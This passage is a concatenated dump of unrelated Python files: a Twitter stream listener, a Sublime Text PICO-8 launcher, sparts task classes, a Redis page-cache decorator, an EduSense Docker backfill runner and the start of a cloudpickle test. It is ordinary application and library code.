            if 'extended_tweet' in tweet:
                self.logs.debug('Decoding extended tweet from Streaming API.')
                return tweet['extended_tweet']['full_text']
            elif 'full_text' in tweet:
                self.logs.debug('Decoding extended tweet from REST API.')
                return tweet['full_text']
            else:
                self.logs.debug('Decoding short tweet.')
                return tweet['text']
        except KeyError:
            self.logs.error('Malformed tweet: %s' % tweet)
            return None

    def get_tweet_link(self, tweet):
        """Creates the link URL to a tweet."""
        if not tweet:
            self.logs.error('No tweet to get link.')
            return None
        try:
            screen_name = tweet['user']['screen_name']
            id_str = tweet['id_str']
        except KeyError:
            self.logs.error('Malformed tweet for link: %s' % tweet)
            return None
        link = TWEET_URL % (screen_name, id_str)
        return link
class TwitterListener(StreamListener):
    """A listener class for handling streaming Twitter data."""

    def __init__(self, callback, logs_to_cloud):
        self.logs_to_cloud = logs_to_cloud
        self.logs = Logs(name='twitter-listener', to_cloud=self.logs_to_cloud)
        self.callback = callback
        self.error_status = None
        self.start_queue()

    def start_queue(self):
        """Creates a queue and starts the worker threads."""
        self.queue = Queue()
        self.stop_event = Event()
        self.logs.debug('Starting %s worker threads.' % NUM_THREADS)
        self.workers = []
        for worker_id in range(NUM_THREADS):
            worker = Thread(target=self.process_queue, args=[worker_id])
            # Daemon threads so a hung worker can't block interpreter exit.
            worker.daemon = True
            worker.start()
            self.workers.append(worker)

    def stop_queue(self):
        """Shuts down the queue and worker threads."""
        # First stop the queue.
        if self.queue:
            self.logs.debug('Stopping queue.')
            self.queue.join()
        else:
            self.logs.warn('No queue to stop.')
        # Then stop the worker threads.
        if self.workers:
            self.logs.debug('Stopping %d worker threads.' % len(self.workers))
            self.stop_event.set()
            for worker in self.workers:
                # Block until the thread terminates.
                worker.join()
        else:
            self.logs.warn('No worker threads to stop.')

    def process_queue(self, worker_id):
        """Continuously processes tasks on the queue."""
        # Create a new logs instance (with its own httplib2 instance) so that
        # there is a separate one for each thread.
        logs = Logs('twitter-listener-worker-%s' % worker_id,
                    to_cloud=self.logs_to_cloud)
        logs.debug('Started worker thread: %s' % worker_id)
        while not self.stop_event.is_set():
            try:
                data = self.queue.get(block=True, timeout=QUEUE_TIMEOUT_S)
                start_time = time()
                self.handle_data(logs, data)
                self.queue.task_done()
                end_time = time()
                qsize = self.queue.qsize()
                # BUG FIX: time() returns seconds; the original logged the raw
                # difference labelled as "ms". Convert to milliseconds.
                logs.debug('Worker %s took %.f ms with %d tasks remaining.' %
                           (worker_id, (end_time - start_time) * 1000, qsize))
            except Empty:
                logs.debug('Worker %s timed out on an empty queue.' %
                           worker_id)
                continue
            except Exception:
                # The main loop doesn't catch and report exceptions from
                # background threads, so do that here.
                logs.catch()
        logs.debug('Stopped worker thread: %s' % worker_id)

    def on_error(self, status):
        """Handles any API errors."""
        self.logs.error('Twitter error: %s' % status)
        self.error_status = status
        self.stop_queue()
        # Returning False tells tweepy to disconnect the stream.
        return False

    def get_error_status(self):
        """Returns the API error status, if there was one."""
        return self.error_status

    def on_data(self, data):
        """Puts a task to process the new data on the queue."""
        # Stop streaming if requested.
        if self.stop_event.is_set():
            return False
        # Put the task on the queue and keep streaming.
        self.queue.put(data)
        return True

    def handle_data(self, logs, data):
        """Sanity-checks and extracts the data before sending it to the
        callback.
        """
        try:
            tweet = loads(data)
        except ValueError:
            logs.error('Failed to decode JSON data: %s' % data)
            return
        try:
            user_id_str = tweet['user']['id_str']
            screen_name = tweet['user']['screen_name']
        except KeyError:
            logs.error('Malformed tweet: %s' % tweet)
            return
        # We're only interested in tweets from Mr. Trump himself, so skip the
        # rest.
        if user_id_str != TRUMP_USER_ID:
            logs.debug('Skipping tweet from user: %s (%s)' %
                       (screen_name, user_id_str))
            return
        logs.info('Examining tweet: %s' % tweet)
        # Call the callback.
        self.callback(tweet)
|
pico_run_cart.py | import sublime
import sublime_plugin
import subprocess
import threading
class PicoRunCartCommand(sublime_plugin.TextCommand):
    """Sublime Text command that launches PICO-8 with the current file as the cart."""

    def run(self, edit):
        def target():
            # shell=True so the quoted paths are interpreted by the shell.
            subprocess.Popen(self.cmd, bufsize=-1, stdin=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)

        # BUG FIX: the original wrapped the setting in quotes *before*
        # comparing against "undefined" ('"undefined"' != "undefined"),
        # so a missing setting was never detected. Check the raw value first.
        pico8_path = self.view.settings().get("pico-8_path", "undefined")
        if pico8_path == "undefined":
            sublime.error_message("Error: \"pico-8_path\" is not defined !\n\nRun \"PICO-8: Setup Path\" from the Command Palette.")
            return
        pico8 = "\"" + pico8_path + "\""
        cart = "\"" + self.view.file_name() + "\""
        self.cmd = pico8 + " -run " + cart
        threading.Thread(target=target).start()
|
vtask.py | # Copyright (c) 2014, Facebook, Inc. All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
#
"""Base Task and related helper classes for sparts' task system
Tasks in sparts are a way to organize and delegate some sort of
background or other synchronized processing. This module defines
the most common features.
"""
from __future__ import absolute_import
import logging
import six
import threading
from six.moves import xrange
from sparts.sparts import _SpartsObject
from sparts.timer import Timer
class VTask(_SpartsObject):
    """The base class for all tasks. Needs to be subclassed to be useful.

    Attributes:
        OPT_PREFIX - Overrides the prefix for any associated options
        LOOPLESS - True indicates this task should not spawn any threads
        DEPS - List of `VTask` subclasses that must be initialized first
        workers - Number of Threads that should execute the `_runloop`
    """
    OPT_PREFIX = None
    LOOPLESS = False
    DEPS = []
    workers = 1

    @property
    def name(self):
        """Task name; defaults to the subclass' class name."""
        return self.__class__.__name__

    def __init__(self, service):
        """Task Constructor. Requires a `service` VService instance.

        You should not need to override this. Override initTask instead."""
        self.service = service
        self.logger = logging.getLogger('%s.%s' % (service.name, self.name))
        self.threads = []

    def initTask(self):
        """Override this to do any task-specific initialization

        Don't forget to call super(...).initTask(), or things may not
        run properly."""
        if not self.LOOPLESS:
            for i in xrange(self.workers):
                # Single-worker tasks keep the plain task name; otherwise
                # number the threads for easier debugging.
                if self.workers == 1:
                    name = self.name
                else:
                    name = '%s-%d' % (self.name, i + 1)
                self.threads.append(
                    threading.Thread(target=self._run, name=name))

    def initTaskThread(self):
        """Override thread-specific initialization for multi-threaded tasks"""

    def start(self):
        """Called during bootstrap to spin up threads post-creation."""
        if not self.LOOPLESS:
            for thread in self.threads:
                thread.start()

    def stop(self):
        """Custom stopping logic for this task.

        This is called by the main VService thread, after a graceful shutdown
        request has been received."""
        pass

    def join(self):
        """Block, waiting for all child worker threads to finish."""
        if not self.LOOPLESS:
            for thread in self.threads:
                # FIX: Thread.isAlive() was removed in Python 3.9;
                # is_alive() is available on both Python 2.6+ and 3.
                while thread.is_alive():
                    # Join with a timeout so the main thread stays responsive.
                    thread.join(0.5)

    @property
    def running(self):
        """Returns True if task is still doing work.

        This base implementation returns True if any child threads are alive"""
        for thread in self.threads:
            if thread.is_alive():
                return True
        return False

    def _run(self):
        """Thread body: per-thread init, then the task's main loop."""
        try:
            self.initTaskThread()
            self._runloop()
        except Exception:
            # In general, you should not get here. So, we will shutdown the
            # server. It is better for your service to *completely* crash in
            # response to an unhandled error, than to continue on in some sort
            # of half-alive zombie state. Please catch your exceptions.
            # Consider throwing a TryLater if this task is a subclass of
            # QueueTask or PeriodicTask.
            #
            # I hate zombies.
            self.logger.exception("Unhandled exception in %s", self.name)
            self.service.shutdown()
        finally:
            # FIX: threading.currentThread() is deprecated; use the PEP 8
            # alias current_thread(), available since Python 2.6.
            self.logger.debug('Thread %s exited',
                              threading.current_thread().name)

    def _runloop(self):
        """For normal (non-LOOPLESS) tasks, this MUST be implemented"""
        # TODO: May require some janky metaprogramming to make ABC enforce
        # this in a cleaner way.
        raise NotImplementedError()

    @classmethod
    def _loptName(cls, name):
        """Long command-line option name, e.g. '--MyTask-some-opt'."""
        return '--' + cls._optName(name).replace('_', '-')

    @classmethod
    def _optName(cls, name):
        """Namespaced option attribute name, e.g. 'MyTask_some_opt'."""
        parts = [cls.OPT_PREFIX or cls.__name__, name]
        return '_'.join(parts).replace('-', '_')

    def getTaskOption(self, opt, default=None):
        """Read this task's option `opt` from the service options."""
        return getattr(self.service.options,
                       self._optName(opt), default)

    def setTaskOption(self, opt, value):
        """Write this task's option `opt` on the service options."""
        setattr(self.service.options, self._optName(opt), value)

    @classmethod
    def register(cls):
        # NOTE(review): REGISTERED is not defined in the visible portion of
        # this module; presumably a module-level registry declared elsewhere.
        REGISTERED.register(cls)
class SkipTask(Exception):
    """Raised from initTask() to exclude a task from execution.

    Use this when a task is missing configuration that it needs to operate
    but that the overall program can live without — for example, an optional
    network-based logging task."""
    pass
class TryLater(Exception):
    """Raised by task implementations to defer the current work item.

    Lets a task temporarily suspend and reschedule execution — useful for
    transient error conditions or deliberate re-queueing of work. When
    `after` is provided, the work is retried after that many seconds."""

    def __init__(self, message=None, after=None):
        super(TryLater, self).__init__(message)
        self.after = after
        self.message = message
class ExecuteContext(object):
    """An abstraction used internally by various tasks to track work

    Encapsulates common metrics for work that can be retried later, hooks for
    signalling completion, etc"""

    def __init__(self, attempt=1, item=None, deferred=None, future=None):
        # attempt: 1-based retry counter for this piece of work
        # item: the work payload itself
        # deferred: optional Twisted-style deferred fired on completion
        # future: optional concurrent.futures-style future resolved on completion
        self.attempt = attempt
        self.item = item
        self.deferred = deferred
        self.future = future
        self.running = threading.Event()
        self.timer = Timer()

    def start(self):
        """Indicate that execution has started"""
        # Idempotent: only the first call starts the timer / flips the future.
        if not self.running.is_set():
            if self.future is not None:
                self.future.set_running_or_notify_cancel()
            self.timer.start()
            self.running.set()

    def set_result(self, result):
        """Indicate that execution has completed"""
        self.timer.stop()
        if self.future is not None:
            self.future.set_result(result)
        if self.deferred is not None:
            self.deferred.callback(result)

    def set_exception(self, exception):
        """Indicate that execution has failed.

        Returns True if an attached deferred errback handled the exception."""
        handled = False
        self.timer.stop()
        if self.future is not None:
            self.future.set_exception(exception)
        if self.deferred is not None:
            # Append a sentinel errback so we can tell whether any earlier
            # errback in the chain consumed the failure.
            unhandled = []
            self.deferred.addErrback(self._unhandledErrback, unhandled)
            self.deferred.errback(exception)
            if not unhandled:
                handled = True
        return handled

    @property
    def elapsed(self):
        """Convenience property. Returns timer duration."""
        return self.timer.elapsed

    @staticmethod
    def _unhandledErrback(error, unhandled):
        """Fallback errback for deferred processing"""
        unhandled.append(error)
        return None

    def __cmp__(self, obj):
        """Custom comparators for comparing contexts' work `item`s

        NOTE(review): __cmp__ and the builtin cmp() exist only on Python 2;
        under Python 3 this method is never invoked (the rich comparisons
        below are used) and would raise NameError if called directly."""
        lhs, rhs = id(self), obj
        if isinstance(obj, ExecuteContext):
            lhs, rhs = self.item, obj.item
        return cmp(lhs, rhs)

    def __lt__(self, obj):
        """Override __lt__ explicitly for priority queue implementations"""
        assert isinstance(obj, ExecuteContext)
        return self.item < obj.item

    def __eq__(self, obj):
        # NOTE(review): defining __eq__ without __hash__ makes instances
        # unhashable on Python 3 — confirm contexts are never stored in
        # sets or used as dict keys.
        assert isinstance(obj, ExecuteContext)
        return self.item == obj.item

    def __ne__(self, obj):
        assert isinstance(obj, ExecuteContext)
        return self.item != obj.item

    def __gt__(self, obj):
        assert isinstance(obj, ExecuteContext)
        return self.item > obj.item
class Tasks(object):
    """Collection class for dealing with service tasks.

    Tasks can be looked up by name via attribute access, or through the
    get()/require() helpers.  Until create() is called the collection holds
    task *classes*; afterwards it holds task *instances*.
    """
    def __init__(self, tasks=None):
        self.logger = logging.getLogger('sparts.tasks')
        self._registered = []        # task classes, in registration order
        self._registered_names = {}  # class name -> task class
        self._created = []           # task instances, in creation order
        self._created_names = {}     # class name -> task instance
        self._did_create = False
        for task_class in (tasks or []):
            self.register(task_class)

    def register(self, task_class):
        """Register `task_class` (and, recursively, its DEPS)."""
        assert not self._did_create
        name = task_class.__name__
        if name in self._registered_names:
            return
        # Dependencies are registered first so they are created first too.
        for dep in task_class.DEPS:
            self.register(dep)
        self._registered.append(task_class)
        self._registered_names[name] = task_class

    def register_all(self, tasks):
        """Register multiple `tasks` classes with the collection."""
        assert not self._did_create
        for task_class in tasks:
            self.register(task_class)

    def unregister(self, task_class):
        """Unregister `task_class` from the collection."""
        assert not self._did_create
        self._registered.remove(task_class)
        self._registered_names.pop(task_class.__name__)

    def create(self, *args, **kwargs):
        """Instantiate every registered task class, forwarding args/kwargs.

        TODO: Handle SkipTask?
        """
        assert not self._did_create
        for task_class in self._registered:
            instance = task_class(*args, **kwargs)
            self._created.append(instance)
            self._created_names[task_class.__name__] = instance
        self._did_create = True

    def remove(self, task):
        """Remove created `task` from the collection."""
        assert self._did_create
        self._created.remove(task)
        self._created_names.pop(task.name)

    def init(self):
        """Call initTask() on every created task; drop ones raising SkipTask.

        Raises a generic Exception afterwards if any task failed to
        initialize for a reason other than SkipTask.
        """
        assert self._did_create
        errors = []
        skipped = []
        for task in self:
            try:
                task.initTask()
            except SkipTask as e:
                # Remember skipped tasks so they can be removed below.
                self.logger.info("Skipping %s (%s)", task.name, e)
                skipped.append(task)
            except Exception as e:
                # Log and collect unexpected init failures so we fail late.
                self.logger.exception("Error creating task, %s", task.name)
                errors.append(e)
        for task in skipped:
            self.remove(task)
        if errors:
            raise Exception("Unable to start service (%d task start errors)" %
                            len(errors))

    def start(self):
        """Start all the tasks, creating worker threads, etc"""
        assert self._did_create
        for task in self.tasks:
            task.start()

    def get(self, task):
        """Return the task instance/class for `task` (name or VTask subclass),
        or None when not present."""
        if isinstance(task, six.string_types):
            name = task
        else:
            assert issubclass(task, VTask)
            name = task.__name__
        mapping = self._created_names if self._did_create else self._registered_names
        return mapping.get(name)

    def require(self, task):
        """Like get(), but raise KeyError when the task is not found."""
        result = self.get(task)
        if result is None:
            raise KeyError('%s not in tasks (%s|%s)' %
                           (task, self.task_classes, self.tasks))
        return result

    @property
    def task_classes(self):
        """A copy of the registered task classes."""
        return self._registered[:]

    @property
    def tasks(self):
        """Copy of the instances after create(); registered classes before."""
        if self._did_create:
            return self._created[:]
        return self.task_classes

    def __getattr__(self, name):
        # NOTE: a missing task raises KeyError (via require), not
        # AttributeError -- preserved from the original behavior.
        return self.require(name)

    def __iter__(self):
        """Iterates on created or registered tasks, as appropriate."""
        return iter(self.tasks)

    def __len__(self):
        """Number of created or registered tasks, as appropriate."""
        return len(self.tasks)

    def __getitem__(self, index):
        """The created or registered task at `index`."""
        return self.tasks[index]
# Module-level `Tasks` collection tracking globally registered tasks.
REGISTERED = Tasks()
|
cached.py | from datetime import datetime, timedelta
from css_html_js_minify import html_minify
import os
import threading
import redis
import web
redis_client = redis.from_url(os.environ.get("REDIS_URL"))
class cached(object):
    """Decorator caching rendered (and minified) pages in Redis, keyed by
    the request path.

    A page is re-rendered once its recorded age exceeds `max_age`.  When a
    (stale) copy is already cached the refresh happens on a background
    thread, so the caller is served the stale copy without blocking; the
    very first render is done synchronously.
    """
    def __init__(self, *args, **kwargs):
        # Maps request path -> datetime of the last cache refresh.
        self.path_cache_time = {}
        # CACHE_AGE (seconds) must be present in the environment.
        self.default_max_age = kwargs.get(
            "default_cache_max_age",
            timedelta(seconds=int(os.environ['CACHE_AGE'])))

    def __refresh_function_param(self, func, path, run_async, *args, **kwargs):
        """Render `func`, minify the result and store it under `path`.

        BUG FIX: this parameter was originally named `async`, which has been
        a reserved keyword since Python 3.7 (SyntaxError); renamed to
        `run_async`.  The parameter is only passed positionally by __call__,
        so the rename is invisible to callers.
        """
        def do_refresh():
            res = func(*args, **kwargs)
            page = str(res)
            page = html_minify(page)
            redis_client.set(path, page)
            self.path_cache_time[path] = datetime.now()
        if run_async:
            threading.Thread(target=do_refresh).start()
        else:
            do_refresh()

    def __call__(self, func):
        def inner(*args, **kwargs):
            path = web.ctx.get('path')
            max_age = kwargs.get('max_age', self.default_max_age)
            is_cached = redis_client.exists(path)
            reload_cache = True
            if path in self.path_cache_time:
                reload_cache = (datetime.now() - self.path_cache_time[path] > max_age)
            else:
                self.path_cache_time[path] = datetime.now()
            if not is_cached or reload_cache:
                if 'max_age' in kwargs:
                    del kwargs['max_age']
                # Refresh asynchronously only when a stale copy already
                # exists (is_cached truthy); otherwise render synchronously
                # so the first request gets content.
                self.__refresh_function_param(func, path, is_cached, *args, **kwargs)
            return redis_client.get(path)
        return inner
|
run_backfill.py | #!/usr/bin/python3
import argparse
import json
import os
import sys
import subprocess
import tempfile
import time
import threading
def get_parameters(run_command):
    """Collect uid/gid, app credentials, storage version and current user.

    `run_command` is sys.argv[0]; it is used to locate the storage
    version.txt relative to where the script was invoked from.
    Returns (uid, gid, app_username, app_password, version, developer).
    """
    uid = os.getuid()
    gid = os.getgid()
    app_username = os.getenv("APP_USERNAME", "")
    app_password = os.getenv("APP_PASSWORD", "")
    # Loading storage server version name.
    # NOTE(review): str.strip('script/run_backfill.py') strips any of those
    # *characters* from both ends -- it is not a substring removal.  It
    # happens to work for the usual invocation paths; confirm before
    # relying on it for other layouts.
    if run_command == 'run_backfill.py':
        file_location = '../storage/version.txt'
        f = open(file_location, 'r')
    else:
        stripped = run_command.strip('script/run_backfill.py')
        # Absolute path first, then relative (was a bare `except`; narrowed
        # to OSError so programming errors are not silently swallowed).
        try:
            f = open('/' + stripped + '/storage/version.txt', 'r')
        except OSError:
            f = open(stripped + '/storage/version.txt', 'r')
    # Use the handle as a context manager -- the original leaked it.
    with f:
        version = f.read().strip('\n')
    # Getting current user (drop the trailing newline from `whoami`).
    process = subprocess.Popen(['whoami'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    stdout, stderr = process.communicate()
    developer = stdout.decode('utf-8')[:-1]
    return uid, gid, app_username, app_password, version, developer
def kill_all_containers():
    """Kill every container in the global `containers` list via the docker CLI."""
    print('killing all containers')
    proc = subprocess.Popen(['docker', 'container', 'kill'] + containers,
                            stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE)
    out, err = proc.communicate()
    # print() is not thread-safe; serialize all output under the shared lock.
    with lock:
        for container_id in out.decode('utf-8').split():
            print('killed container', container_id)
        print(err)
        print("\n")
def wait_container(container):
    """Block until `container` exits, report its exit status, and drop it
    from the global bookkeeping structures in a thread-safe way."""
    process = subprocess.Popen([
        'docker', 'container', 'wait',
        container],
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE)
    stdout, stderr = process.communicate()
    process = subprocess.Popen([
        'docker', 'inspect', container, "--format='{{.State.ExitCode}}'"],
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE)
    # BUG FIX: the inspect process's output was never read -- `stdout` still
    # held the `docker wait` result and the inspect child was left dangling.
    # Collect the inspect output explicitly before using it.
    stdout, stderr = process.communicate()
    status = stdout.decode('utf-8')
    # print is not thread-safe, and the globals are shared with other
    # waiter threads -- serialize everything under the shared lock.
    with lock:
        print(container_dict[container], "exited with status code", status)
        # remove the container from the global list and dict
        containers.remove(container)
        del container_dict[container]
# Shared lock serializing print() output and mutation of the globals below.
lock=threading.Lock()
## a global list of container id's
containers=[]
# Maps container id -> human-readable label (e.g. 'front video container').
container_dict={}
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='EduSense deploy video')
    parser.add_argument('--front_video', dest='front_video', type=str, nargs='?',
                        required=True, help='video file for front ip camera')
    parser.add_argument('--developer', dest='dev', type=str, nargs='?',
                        required=True, help='enter developer tag name')
    parser.add_argument('--back_video', dest='back_video', type=str, nargs='?',
                        required=True, help='video for back ip camera')
    parser.add_argument('--keyword', dest='keyword', type=str, nargs='?',
                        required=True, help='Keyword for class session')
    parser.add_argument('--backend_url', dest='backend_url', type=str, nargs='?',
                        required=True, help='EduSense backend address')
    parser.add_argument('--front_num_gpu_start', dest='front_num_gpu_start', type=int, nargs='?',
                        required=True, help='GPU start index for front camera processing')
    parser.add_argument('--front_num_gpu', dest='front_num_gpu', type=int, nargs='?',
                        required=True, help='number of GPUs for front camera processing')
    parser.add_argument('--back_num_gpu_start', dest='back_num_gpu_start', type=int, nargs='?',
                        required=True, help='GPU start index for back camera processing')
    parser.add_argument('--back_num_gpu', dest='back_num_gpu', type=int, nargs='?',
                        required=True, help='number of GPUs for back camera processing')
    parser.add_argument('--time_duration', dest='time_duration', type=int, nargs='?',
                        required=True, help='time duration for executing CI')
    parser.add_argument('--video_schema', dest='video_schema', type=str, nargs='?',
                        required=True, help='video schema for CI')
    parser.add_argument('--audio_schema', dest='audio_schema', type=str, nargs='?',
                        required=True, help='audio schema for CI')
    parser.add_argument('--timeout', dest='timeout', type=int, nargs='?',
                        help='timeout for the script',default=7200)
    parser.add_argument('--log_dir', dest='log_dir' ,type=str, nargs='?',
                        help='get the logs in a directory')
    parser.add_argument('--video_dir', dest='video_dir', type=str, nargs='?',
                        required=True, help='directory for video')
    parser.add_argument('--process_real_time', dest='process_real_time',
                        action='store_true', help='if set, skip frames to keep'
                        ' realtime')
    parser.add_argument('--tensorflow_gpu', dest='tensorflow_gpu', type=str, nargs='?',
                        default='-1', help='tensorflow gpus')
    parser.add_argument('--overwrite', dest='overwrite', type=str, nargs='?', default='False',
                        help='To enable overwriting previous backfilled session, enter: True')
    args = parser.parse_args()
    uid, gid, app_username, app_password, version, developer = get_parameters(sys.argv[0])
    #Calling sessions API endpoint
    # NOTE(review): the JSON body is built by string interpolation, so a
    # keyword containing a double quote would break it, and the credentials
    # are visible on the curl command line (e.g. to `ps`) -- confirm this is
    # acceptable for an internal tool.
    process = subprocess.Popen([
        'curl',
        '-X', 'POST',
        '-d', '{\"developer\": \"%s\", \"version\": \"%s\", \"keyword\": \"%s\", \"overwrite\": \"%s\"}' % (developer, version, args.keyword, args.overwrite),
        '--header', 'Content-Type: application/json',
        '--basic', '-u', '%s:%s' % (app_username, app_password),
        'https://%s/sessions' % args.backend_url],
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE)
    stdout, stderr = process.communicate()
    print(stdout)
    try:
        output = json.loads(stdout.decode('utf-8'))
        success = output['success']
        session_id = output['session_id'].strip()
    except:
        print("Unable to create a session")
        print("check APP username and password")
        sys.exit(1)
    print('created session', session_id)
    real_time_flag = ['--process_real_time'] if args.process_real_time \
        else []
    # create temp directory
    with tempfile.TemporaryDirectory() as tmp_dir:
        if args.log_dir == None:
            args.log_dir=tmp_dir
        print('create temporary directory', tmp_dir)
        # Container 1: front-camera video pipeline (talks to openpose over
        # /tmp/unix.front.sock).
        process = subprocess.Popen([
            'docker', 'run','-d',
            '--gpus','all',
            '-e', 'LOCAL_USER_ID=%s' % uid,
            '-e', 'APP_USERNAME=%s' % app_username,
            '-e', 'APP_PASSWORD=%s' % app_password,
            '-v', '%s:/app/source' %args.video_dir,
            '-v', '%s:/tmp' % args.log_dir,
            'edusense/video:'+args.dev,
            '--video',os.path.join('/app', 'source', args.front_video),
            '--video_sock', '/tmp/unix.front.sock',
            '--backend_url', args.backend_url,
            '--session_id', session_id,
            '--schema', args.video_schema,
            '--use_unix_socket',
            '--keep_frame_number',
            '--gaze_3d',
            '--process_gaze',
            '--profile',
            '--time_duration', str(args.time_duration + 60) if args.time_duration >= 0 else '-1'] + real_time_flag,
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE)
        stdout, stderr = process.communicate()
        front_video_container_id = stdout.decode('utf-8').strip()
        containers.append(front_video_container_id)
        container_dict[front_video_container_id]='front video container'
        print('created front video container', front_video_container_id)
        # Container 2: back-camera video pipeline (instructor view).
        process = subprocess.Popen([
            'docker', 'run', '-d',
            '--gpus','all',
            '-e', 'LOCAL_USER_ID=%s' % uid,
            '-e', 'APP_USERNAME=%s' % app_username,
            '-e', 'APP_PASSWORD=%s' % app_password,
            '-v', '%s:/tmp' % args.log_dir,
            '-v', '%s:/app/source' %args.video_dir,
            'edusense/video:'+args.dev,
            '--video',os.path.join('/app', 'source', args.back_video),
            '--video_sock', '/tmp/unix.back.sock',
            '--backend_url', args.backend_url,
            '--session_id', session_id,
            '--schema', args.video_schema,
            '--use_unix_socket',
            '--keep_frame_number',
            '--time_duration', str(args.time_duration + 60) if args.time_duration >= 0 else '-1',
            '--gaze_3d',
            '--process_gaze',
            '--profile',
            '--instructor'] + real_time_flag,
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE)
        stdout, stderr = process.communicate()
        back_video_container_id = stdout.decode('utf-8').strip()
        containers.append(back_video_container_id)
        container_dict[back_video_container_id]='back video container'
        print('created back video container', back_video_container_id)
        # Give the video containers time to create their unix sockets before
        # the openpose producers attach to them.
        time.sleep(30)
        # Container 3: front-camera openpose producer.
        process = subprocess.Popen([
            'nvidia-docker', 'run', '-d',
            '-e', 'LOCAL_USER_ID=%s' % uid,
            '-v', '%s:/tmp' %args.log_dir,
            '-v', '%s:/app/video' % args.video_dir,
            'edusense/openpose:'+args.dev,
            '--video', os.path.join('/app', 'video', args.front_video),
            '--num_gpu_start', str(args.front_num_gpu_start),
            '--num_gpu', str(args.front_num_gpu),
            '--use_unix_socket',
            '--unix_socket', os.path.join('/tmp', 'unix.front.sock'),
            '--display', '0',
            '--render_pose', '0',
            '--raw_image'] + real_time_flag,
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE)
        stdout, stderr = process.communicate()
        front_openpose_container_id = stdout.decode('utf-8').strip()
        containers.append(front_openpose_container_id)
        container_dict[front_openpose_container_id]='front openpose container'
        print('created front openpose container', front_openpose_container_id)
        # Container 4: back-camera openpose producer.
        process = subprocess.Popen([
            'nvidia-docker', 'run', '-d',
            '-e', 'LOCAL_USER_ID=%s' % uid,
            '-v', '%s:/tmp' %args.log_dir,
            '-v', '%s:/app/video' % args.video_dir,
            'edusense/openpose:'+args.dev,
            '--video', os.path.join('/app', 'video', args.back_video),
            '--num_gpu_start', str(args.back_num_gpu_start),
            '--num_gpu', str(args.back_num_gpu),
            '--use_unix_socket',
            '--unix_socket', os.path.join('/tmp', 'unix.back.sock'),
            '--display', '0',
            '--render_pose', '0',
            '--raw_image'] + real_time_flag,
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE)
        stdout, stderr = process.communicate()
        back_openpose_container_id = stdout.decode('utf-8').strip()
        containers.append(back_openpose_container_id)
        container_dict[back_openpose_container_id]='back openpose container'
        print('created back openpose container', back_openpose_container_id)
        # Container 5: audio pipeline, processing both camera feeds.
        process = subprocess.Popen([
            'docker', 'run', '-d',
            '-e', 'LOCAL_USER_ID=%s' % uid,
            '-e', 'APP_USERNAME=%s' % app_username,
            '-e', 'APP_PASSWORD=%s' % app_password,
            '-v', '%s:/app/video' % args.video_dir,
            '-v', '%s:/tmp' % args.log_dir,
            'edusense/audio:'+args.dev,
            '--front_url', os.path.join('/app', 'video', args.front_video),
            '--back_url', os.path.join('/app', 'video', args.back_video),
            '--backend_url', args.backend_url,
            '--session_id', session_id,
            '--time_duration', str(args.time_duration + 60) if args.time_duration >= 0 else '-1',
            '--schema', args.audio_schema],
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE)
        stdout, stderr = process.communicate()
        audio_container_id = stdout.decode('utf-8').strip()
        containers.append(audio_container_id)
        container_dict[audio_container_id]='audio container'
        print('created audio container', audio_container_id,'\n\n')
        ## the script can be kept running and dockers will be killed after timeout seconds
        timer = threading.Timer(args.timeout, kill_all_containers)
        timer.start()
        ## make seperate threads for containers
        threads=[]
        for container in containers:
            t=threading.Thread(target=wait_container,args=[container])
            t.start()
            threads.append(t)
        ## join the threads
        for thread in threads:
            thread.join()
        ## cancel the killing thread execution
        timer.cancel()
|
test_cloudpickle.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 1999-2017 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import base64
import json
import multiprocessing
import os
import pickle
import subprocess
import sys
import tempfile
import textwrap
import traceback
import uuid
from odps.compat import six, unittest, PY27
from odps.lib.cloudpickle import loads, dumps
from odps.utils import to_binary
from odps.tests.core import TestBase, numpy_case
# if bytecode needed in debug, switch it on
DUMP_CODE = False
CROSS_VAR_PICKLE_CODE = """
import base64
import json
import sys
import platform
import os
import pickle
try:
os.unlink(os.path.realpath(__file__))
except Exception:
pass
import_paths = json.loads(r\"\"\"
{import_paths}
\"\"\".strip())
sys.path.extend(import_paths)
from odps.lib.cloudpickle import dumps
from odps.utils import to_str
from {module_name} import {method_ref}
client_impl = (sys.version_info[0],
sys.version_info[1],
platform.python_implementation().lower())
result_obj = {method_ref}()
result_tuple = (
base64.b64encode(dumps(result_obj, dump_code={dump_code})),
client_impl,
)
with open(r'{pickled_file}', 'w') as f:
f.write(to_str(base64.b64encode(pickle.dumps(result_tuple, protocol=0))))
f.close()
""".replace('{module_name}', __name__).replace('{dump_code}', repr(DUMP_CODE))
def pickled_runner(q, pickled, args, kwargs, **kw):
    """Child-process target: deserialize `pickled`, invoke it, queue the result.

    An optional pickled 'wrapper' in `kw` post-processes the call; `impl`
    in `kwargs` names the interpreter that produced the pickle.
    """
    try:
        raw_wrapper = kw.pop('wrapper', None)
        impl = kwargs.pop('impl', (3, 5, 'cpython'))
        call = loads(raw_wrapper) if raw_wrapper else (lambda v, a, kw: v(*a, **kw))
        target = loads(base64.b64decode(pickled), impl=impl, dump_code=DUMP_CODE)
        q.put(call(target, args, kwargs))
    except:
        # Bare except kept deliberately: print the traceback in the child
        # (otherwise it is lost) and re-raise so the exit code is non-zero.
        traceback.print_exc()
        raise
def run_pickled(pickled, *args, **kwargs):
    """Run a cross-interpreter pickled callable in a child process and
    return its result.

